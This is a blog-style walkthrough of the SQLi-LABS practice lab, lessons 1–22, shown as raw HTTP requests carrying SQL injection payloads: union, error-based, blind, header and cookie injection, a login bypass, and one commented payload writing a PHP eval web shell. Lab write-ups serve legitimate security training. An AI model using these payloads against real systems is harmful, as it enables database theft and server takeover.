SQLi-LABS Page-1 (Basic Challenges)

Less-1 Error Based- String

GET /Less-1/?id=-1' union select 1,version(),database() --+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

QQ截图20220621110101.jpg

Less-2 Error Based- Intiger

GET /Less-2/?id=-1%20union%20select%201,version(),database()  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

QQ截图20220621110649.jpg

Less-3 Error Based- String (with Twist)

GET /Less-3/?id=-1%27)%20union%20select%201,version(),database()--+  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

QQ截图20220621144800.jpg

Less-4 Error Based- DoubleQuotes String

GET /Less-4/?id=-1")%20union%20select%201,version(),database()--+  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

QQ截图20220621145136.jpg

Less-5 Double Query- Single Quotes- String

GET /Less-5/?id=1' and updatexml(1,concat('^',(select database()),'^'),1) and '1'='1  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

QQ截图20220621145642.jpg

Less-6 Double Query- Double Quotes- String

GET /Less-6/?id=1" and updatexml(1,concat('^',(select database()),'^'),1) and '1'="1  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

QQ截图20220621150150.jpg

Less-7 Dump into Outfile

这关标题原意是通过导出文件的方式进行,这里需要开启secure_file_priv参数,这里用sleep证明注入成功

#?id=1'))UNION SELECT 1,2,'<?php @eval($_post[777])?>' i
nto outfile "/www/sqli-labs-master/Less-7/eval.php"--+
GET /Less-7/?id=1')) and sleep(2) and '1'=(('1  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

QQ截图20220621152529.jpg

Less-8 Blind- Boolian- Single Quotes- String

判断数据库长度为7和8时布尔值结果不同,显示效果不同

GET /Less-8/?id=1%27%20and%20length(database())=8--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

QQ截图20220621152949.jpg

QQ截图20220621152846.jpg

Less-9 Blind- Time based- Single Quotes- String

判断数据库长度为7和8时布尔值结果不同进行延时,响应时间不同

GET /Less-9/?id=1' and if((length(database())=8),sleep(5),1);--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

QQ截图20220621154039.jpg

QQ截图20220621154117.jpg

Less-10 Blind- Time based- Double Quotes- String

GET /Less-10/?id=1" and if((length(database())=8),sleep(5),1);--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

QQ截图20220621154312.jpg

Less-11- Error Based- String

POST /Less-11/ HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 72
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-11/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

uname=1Dumb' union select version(),database();--+&passwd=&submit=Submit

QQ截图20220621154937.jpg

Less-12- Error Based- Double quotes- String

POST /Less-12/ HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 73
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-11/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

uname=1Dumb") union select version(),database();--+&passwd=&submit=Submit

QQ截图20220621155201.jpg

Less-13- Double Injection- String- with twist

POST /Less-13/ HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 65
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-13/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

uname=Dumb%27) and length(database())=8;--+&passwd=&submit=Submit

QQ截图20220621160522.jpg

QQ截图20220621160549.jpg

Less-14- Double Injection- Double quotes- String

POST /Less-14/ HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 62
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-13/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

uname=Dumb" and length(database())=8;--+&passwd=&submit=Submit

QQ截图20220621161033.jpg

QQ截图20220621161049.jpg

Less-15- Blind- Boolian Based- String

POST /Less-15/ HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 62
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-13/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

uname=Dumb' and length(database())=8;--+&passwd=&submit=Submit

QQ截图20220621161222.jpg

QQ截图20220621161256.jpg

Less-16- Blind- Time Based- Double quotes- String

虽然是延时盲注,好像布尔值也可以做出来

POST /Less-16/ HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 63
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-13/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

uname=Dumb") and length(database())=8;--+&passwd=&submit=Submit

QQ截图20220621161713.jpg

QQ截图20220621161731.jpg

Less-17 Update Query- Error based - String

POST /Less-17/ HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 92
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-17/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

uname=Dumb&passwd=' and updatexml(1,concat('^',(select database()),'^'),1);--+&submit=Submit

QQ截图20220621162715.jpg

Less-18 Header Injection- Error Based- string

POST /Less-18/ HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 42
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: ' and updatexml(1,concat('^',(select database()),'^'),1) and 1='1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-18/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
X-Forwarded-For: 1.1.1.1

uname=Dumb&passwd=' or 1='1 &submit=Submit

QQ截图20220621164926.jpg

Less-19 Header Injection- Referer- Error Based- string

POST /Less-19/ HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 42
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-18/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Referer:  ' and updatexml(1,concat('^',(select database()),'^'),1) and 1='1

uname=Dumb&passwd=' or 1='1 &submit=Submit

QQ截图20220622092451.jpg

Less-20 Cookie Injection- Error Based- string

先进行登录

user:Dumb,pass:' or 1='1

QQ截图20220622092820.jpg

GET /Less-20/index.php HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-20/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: uname= ' and updatexml(1,concat('^',(select database()),'^'),1) and 1='1
Connection: close

QQ截图20220622092916.jpg

Less-21 Cookie Injection- Error Based- complex - string

先进行登录

user:Dumb,pass:' or 1='1,登录后uname进行了base64加密

QQ截图20220622093333.jpg

加密前原文:' and updatexml(1,concat('^',(select database()),'^'),1) and 1='1

GET /Less-21/index.php HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-21/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: uname=JyBhbmQgdXBkYXRleG1sKDEsY29uY2F0KCdeJywoc2VsZWN0IGRhdGFiYXNlKCkpLCdeJyksMSkgYW5kIDE9JzE=
Connection: close

QQ截图20220622093503.jpg

Less-22 Cookie Injection- Error Based- Double Quotes - string

先进行登录

user:Dumb,pass:' or 1='1

QQ截图20220622093618.jpg

加密前原文:" and updatexml(1,concat('^',(select database()),'^'),1) and 1="1

GET /Less-22/index.php HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-22/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: uname=IiBhbmQgdXBkYXRleG1sKDEsY29uY2F0KCdeJywoc2VsZWN0IGRhdGFiYXNlKCkpLCdeJyksMSkgYW5kIDE9IjE=
Connection: close

QQ截图20220622093720.jpg

手机上阅读

最后一次更新于2022-06-28 14:40

神出鬼没的Enderman

long long ago,I was born.

Less-1 Error Based- String

Less-2 Error Based- Intiger

Less-3 Error Based- String (with Twist)

Less-4 Error Based- DoubleQuotes String

Less-5 Double Query- Single Quotes- String

Less-6 Double Query- Double Quotes- String

Less-7 Dump into Outfile

Less-8 Blind- Boolian- Single Quotes- String

Less-9 Blind- Time based- Single Quotes- String

Less-10 Blind- Time based- Double Quotes- String

Less-11- Error Based- String

Less-12- Error Based- Double quotes- String

Less-13- Double Injection- String- with twist

Less-14- Double Injection- Double quotes- String

Less-15- Blind- Boolian Based- String

Less-16- Blind- Time Based- Double quotes- String

Less-17 Update Query- Error based - String

Less-18 Header Injection- Error Based- string

Less-19 Header Injection- Referer- Error Based- string

Less-20 Cookie Injection- Error Based- string

Less-21 Cookie Injection- Error Based- complex - string

Less-22 Cookie Injection- Error Based- Double Quotes - string

86.SRC挖掘-教育行业平台&规则&批量自动化

SQLi-LABS Page-2 (Adv Injections)